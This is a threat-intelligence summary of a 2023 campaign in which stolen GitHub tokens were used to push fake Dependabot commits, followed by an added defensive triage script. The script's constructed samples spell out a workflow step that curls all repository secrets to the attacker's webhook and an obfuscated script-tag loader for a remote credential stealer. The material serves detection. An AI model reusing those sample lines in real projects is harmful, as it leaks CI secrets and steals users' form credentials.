Surprise: When Dependabot Contributes Malicious Code  

In July 2023 attackers used stolen GitHub personal access tokens to push malicious commits impersonating Dependabot. Each push added a GitHub Actions workflow (hook.yml) that exfiltrated repository secrets to hxxps://send[.]wagateway[.]pro/webhook and appended to every *.js file an obfuscated loader for a remote client.js that steals web‑form credentials. The campaign affected hundreds of public and private repositories (many belonging to Indonesian accounts), was automated, and exploited the lack of PAT‑usage visibility for non‑enterprise GitHub accounts. #Dependabot #wagatewaypro

Keypoints

  • Attackers stole GitHub personal access tokens (PATs) from developers’ environments and used them to authenticate and push malicious changes.
  • Malicious commits were crafted to appear as Dependabot contributions (author “dependabot[bot]”) to avoid scrutiny.
  • An added GitHub Actions workflow file (hook.yml) exfiltrated repository secrets and variables to hxxps://send[.]wagateway[.]pro/webhook on push events.
  • Attackers appended an obfuscated line to every *.js file to inject a script tag loading hxxps://send[.]wagateway[.]pro/client.js, which intercepts and exfiltrates web form credentials.
  • The campaign targeted hundreds of repositories (public and private), was automated, and likely began after PATs were exfiltrated from compromised development machines (possibly via malicious packages).
  • Visibility into PAT usage is limited for non‑enterprise GitHub accounts, hindering detection of this kind of abuse.
  • Mitigations include rotating to fine‑grained PATs, auditing workflow files and recent diffs, and scanning for unexpected external script loads in served JS.

MITRE Techniques

  • [T1078] Valid Accounts – Use of stolen GitHub personal access tokens to authenticate and push malicious commits (“victims’ GitHub personal access token was stolen and used by the attackers to contribute those malicious code contributions.”).
  • [T1036] Masquerading – Impersonation of Dependabot by fabricating commit author/commit messages to evade review (‘The attackers created a commit message “fix” appear to be contributed by user account “dependabot[bot]”’).
  • [T1195] Supply Chain Compromise – Modifying repositories (workflows and source files) to distribute malicious code to downstream users (“modified every existing project file having the ‘*.js’ extension and append an obfuscated line”).
  • [T1567.004] Exfiltration Over Web Service: Exfiltration Over Webhook – Workflow sends repository secrets/variables to a remote webhook at hxxps://send[.]wagateway[.]pro/webhook (“sends GitHub secrets and variables to URL hxxps://send[.]wagateway[.]pro/webhook”).
  • [T1059.007] Command and Scripting Interpreter: JavaScript – Appending obfuscated JavaScript to *.js files that loads remote client.js to intercept form credentials (“load an additional script from this URL: hxxps://send[.]wagateway[.]pro/client.js?cache=ignore”).

Indicators of Compromise

  • [Domain] Exfiltration / C2 endpoint – wagateway[.]pro
  • [URL] Exfiltration and credential‑stealing scripts – hxxps://send[.]wagateway[.]pro/webhook, hxxps://send[.]wagateway[.]pro/client.js
  • [File name] Malicious workflow added to repositories – hook.yml
  • [File modification] Appended obfuscated JavaScript to web assets – *.js files appended with script loader to client.js
  • [Repository examples] Observed malicious commits in repositories – highpolar-softwares/I-help-privacy-policy, juniorriau/kejaribiak

In affected projects the technical flow was: a developer’s GitHub personal access token (stored locally for git operations) was exfiltrated (likely via a compromised development environment or malicious package). The attacker used those PATs to authenticate to GitHub, fabricate commits that appeared to come from “dependabot[bot],” and push automated changes across many repositories.

The pushed changes consisted of two coordinated payloads: (1) a new GitHub Actions workflow file (hook.yml) that triggers on push, collects the repository's secrets and variables, and sends them to hxxps://send[.]wagateway[.]pro/webhook; and (2) an obfuscated line appended to every *.js file that injects a script tag loading hxxps://send[.]wagateway[.]pro/client.js?cache=ignore. Because the workflow runs in the repository's own CI, it has legitimate access to every secret the project has configured. The client.js payload hooks form submissions in the victim's browser and posts the captured credentials to the same webhook endpoint.

Detection is hampered on two fronts: fake Dependabot commits pass casual review because the author looks like routine bot noise, and non‑enterprise GitHub accounts get no audit log of PAT usage, so a token being used from an attacker's machine leaves no visible trace. Practical technical mitigations include revoking the exposed classic tokens and replacing them with GitHub fine‑grained personal access tokens scoped to the minimum repositories and permissions, auditing new or modified workflow files and recent diffs (especially any hook.yml and any workflow that references the secrets context alongside an external URL), scanning served JS for unexpected external script loads, and monitoring for suspicious commit authorship and unusual push activity from developer accounts. One cheap authorship check: genuine Dependabot commits are signed by GitHub, so a commit claiming dependabot[bot] authorship without a valid signature is suspect.
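The following triage script is an added example and is not code from the Checkmarx post or from GitHub. It applies the three checks above (workflow referencing secrets while talking to an external host, external script loads hidden behind cheap obfuscation in JS files, and Dependabot‑authored commits that lack GitHub's signature) to local copies of a repository's workflows, JS assets and `git log --format='%H|%an|%G?'` output. The allowlists, the sample hook.yml, the sample JS line and the git‑log lines are constructed to mirror the description above; they are not the real artefacts, and the signature check assumes that real Dependabot commits carry a good GitHub signature.

```python
"""Triage checks for the Dependabot-impersonation pattern (added example)."""
import re

# Hosts a workflow may legitimately contact. Assumed per-organisation allowlist.
ALLOWED_WORKFLOW_HOSTS = {"github.com", "api.github.com"}
# Origins the front end is expected to load scripts from. Assumed value.
ALLOWED_SCRIPT_HOSTS = {"cdn.jsdelivr.net"}
# Author name the attackers spoofed; genuine commits from this author are signed.
DEPENDABOT_AUTHOR = "dependabot[bot]"

URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")
SECRETS_RE = re.compile(r"toJSON\(\s*secrets\s*\)|\$\{\{\s*secrets\.")
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(([\d,\s]+)\)")
HEX_ESC_RE = re.compile(r"\\x([0-9a-fA-F]{2})")


def deobfuscate(js: str) -> str:
    """Resolve String.fromCharCode(...) and \\xNN escapes so a hidden URL becomes visible."""
    js = FROMCHARCODE_RE.sub(
        lambda m: "".join(chr(int(n)) for n in m.group(1).split(",")), js)
    return HEX_ESC_RE.sub(lambda m: chr(int(m.group(1), 16)), js)


def scan_workflow(text: str) -> list[str]:
    """Return non-allowlisted hosts if the workflow also references the secrets context."""
    external = sorted({h for h in URL_RE.findall(text)
                       if h not in ALLOWED_WORKFLOW_HOSTS})
    return external if SECRETS_RE.search(text) and external else []


def scan_js(text: str) -> list[tuple[int, str]]:
    """Return (line number, host) for every external script host after deobfuscation."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for host in sorted(set(URL_RE.findall(deobfuscate(line)))):
            if host not in ALLOWED_SCRIPT_HOSTS:
                findings.append((lineno, host))
    return findings


def suspicious_dependabot_commits(git_log: str) -> list[str]:
    """Given ``git log --format='%H|%an|%G?'`` lines, return SHAs that claim
    Dependabot authorship but whose signature status is not 'G' (good)."""
    bad = []
    for line in git_log.strip().splitlines():
        sha, author, sig = line.split("|")
        if author == DEPENDABOT_AUTHOR and sig != "G":
            bad.append(sha)
    return bad


# Constructed sample inputs modelled on the description; not the real artefacts.
SAMPLE_HOOK_YML = """\
name: hook
on: [push]
jobs:
  run:
    runs-on: ubuntu-latest
    steps:
      - run: |
          curl -s -X POST -d '${{ toJSON(secrets) }}' https://send.wagateway.pro/webhook
"""

SAMPLE_JS = (
    'export function greet(n){return "hi "+n}\n'
    # Appended loader: "<script src=" via fromCharCode, "https" via \xNN escapes.
    'document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34)'
    '+"\\x68\\x74\\x74\\x70\\x73://send.wagateway.pro/client.js?cache=ignore'
    '\\x22\\x3e\\x3c/script\\x3e");\n'
)

SAMPLE_GIT_LOG = """\
1111111|alice|N
2222222|dependabot[bot]|G
3333333|dependabot[bot]|N
"""

if __name__ == "__main__":
    print("workflow ->", scan_workflow(SAMPLE_HOOK_YML))
    print("js       ->", scan_js(SAMPLE_JS))
    print("commits  ->", suspicious_dependabot_commits(SAMPLE_GIT_LOG))
```

Run it as-is to see the three findings on the constructed samples, or feed it real `.github/workflows/*.yml` bodies, served JS files and the output of `git log --format='%H|%an|%G?'` from a checkout. The deobfuscation step is deliberately minimal: it handles only the two encodings that fit on a single appended line, which is enough to surface a hard-coded external host without executing the script.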

Read more: https://checkmarx.com/blog/surprise-when-dependabot-contributes-malicious-code/